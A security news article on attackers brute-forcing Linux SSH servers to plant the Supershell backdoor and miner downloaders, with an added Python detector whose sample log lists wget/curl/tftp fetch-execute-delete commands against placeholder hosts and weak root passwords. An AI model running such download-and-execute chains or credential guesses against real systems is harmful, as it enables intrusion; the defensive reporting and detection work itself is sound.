
Hackers Exploiting Supershell Malware to Target Linux SSH Servers


A recent attack campaign targeting inadequately secured Linux SSH servers has been identified by researchers, shedding light on the use of Supershell, a cross-platform reverse shell backdoor written in Go, which grants attackers remote control over compromised systems.

After the initial infiltration, the attackers are believed to have deployed scanners to pinpoint additional vulnerable targets, followed by launching dictionary attacks using credentials obtained from the compromised systems.

A list of threat actor IP addresses and corresponding root credentials has been uncovered, including common passwords such as “root/password” and “root/123456789,” which attackers frequently try in order to gain unauthorized access to vulnerable systems.

The presence of such credentials on compromised devices signifies a significant security risk, as they can be used to execute malicious activities, pilfer sensitive information, and disrupt operations. Hence, the identification and mitigation of these vulnerabilities are imperative to safeguard systems from potential threats.

The threat actor employed various techniques to download and execute malicious scripts post-compromise. Using the wget, curl, tftp, and ftpget commands, the attacker downloaded scripts from multiple sources, including web servers, FTP servers, and services on non-standard ports.

Subsequently, the downloaded scripts were executed using shell commands (sh, bash), providing the attacker with remote access and potentially facilitating the installation of additional malware. Following this, attempts were made to erase traces of the attack by deleting the downloaded scripts and other associated files.
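The download, execute, delete sequence described above is something a defender can look for in per-session command telemetry. The following is an added detection example, not code from the article or from ASEC; the log format (one line per command, prefixed with a session id), the sample commands, and the flag handling for each downloader are constructed assumptions.

```python
from collections import defaultdict

# Constructed sample of per-session command lines, in the shape a host agent
# (auditd execve records or a session recording) might export: "<session> <argv>".
SAMPLE_LOG = """\
sess1 wget http://198.51.100.10:8080/x.sh -O /tmp/x.sh
sess1 sh /tmp/x.sh
sess1 rm -f /tmp/x.sh
sess2 curl -fsSL ftp://203.0.113.5/.a -o /var/tmp/.a
sess2 bash /var/tmp/.a
sess3 wget https://example.org/index.html -O /tmp/index.html
sess4 tftp -g -r b.sh 192.0.2.7 9999
sess4 sh b.sh
sess4 rm b.sh
"""

DOWNLOADERS = ("wget", "curl", "tftp", "ftpget")
INTERPRETERS = ("sh", "bash")

def target_file(argv):
    """Local file a download writes to (assumed: wget -O, curl -o, tftp -l/-r, else last arg)."""
    for flag in ("-O", "-o", "-l", "-r"):
        if flag in argv and argv.index(flag) + 1 < len(argv):
            return argv[argv.index(flag) + 1]
    return argv[-1]

def detect_chains(log_text):
    """Per session and downloaded file, the stages observed: download, execute, delete."""
    state = defaultdict(dict)
    for line in log_text.strip().splitlines():
        sess, _, cmd = line.partition(" ")
        argv = cmd.split()
        tool = argv[0].rsplit("/", 1)[-1]  # tolerate absolute paths such as /usr/bin/wget
        if tool in DOWNLOADERS:
            state[sess].setdefault(target_file(argv), set()).add("download")
        elif tool in INTERPRETERS or tool == "rm":
            stage = "execute" if tool in INTERPRETERS else "delete"
            for name in argv[1:]:
                # only count a delete when the same file was already run
                if name in state[sess] and (stage == "execute" or "execute" in state[sess][name]):
                    state[sess][name].add(stage)
    return {s: {f: sorted(st) for f, st in files.items()} for s, files in state.items()}

def suspicious_sessions(log_text):
    """Sessions that ran a file they fetched; the full chain also wiped that file."""
    return {s: "download-execute-delete" if "delete" in st else "download-execute"
            for s, files in detect_chains(log_text).items()
            for st in files.values() if "execute" in st}
```

A plain download with no execution (sess3 above) is deliberately not flagged, which keeps routine package or artifact fetches out of the alert stream.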

Initially installed on a poorly managed Linux system, the obfuscated Supershell backdoor offers the attacker remote control capabilities, evident from its internal strings, behavior, and execution logs. While the primary goal appears to be control hijacking, there exists a possibility that the attacker also aims to install a cryptocurrency miner like XMRig to exploit the system’s resources for personal gain, aligning with common attack patterns targeting vulnerable Linux systems.

Threat actors are exploiting vulnerable Linux SSH servers by deploying the Supershell backdoor, enabling remote control of infected systems and potentially resulting in data theft, system compromise, and other malicious activity. According to ASEC, administrators should prioritize strong password hygiene, regular updates, and robust security measures such as firewalls to mitigate this threat effectively. Additionally, keeping V3 (AhnLab's antivirus product) up to date is important for blocking these malware infections.

The detected malware includes a Cobalt Strike backdoor, a shell agent downloader, and an ElfMiner downloader. The first is identified as Backdoor/Linux.CobaltStrike.3753120 and was likely deployed for remote access and control. The shell agent downloader, Downloader/Shell.Agent.SC203780, was designed to download and execute additional malicious payloads. The ElfMiner downloader, Downloader/Shell.ElfMiner.S1705, was presumably used to download and install cryptocurrency mining malware.

By implementing these countermeasures, organizations can significantly reduce their vulnerability to Supershell attacks and fortify their cybersecurity defenses against evolving threats in the digital landscape.
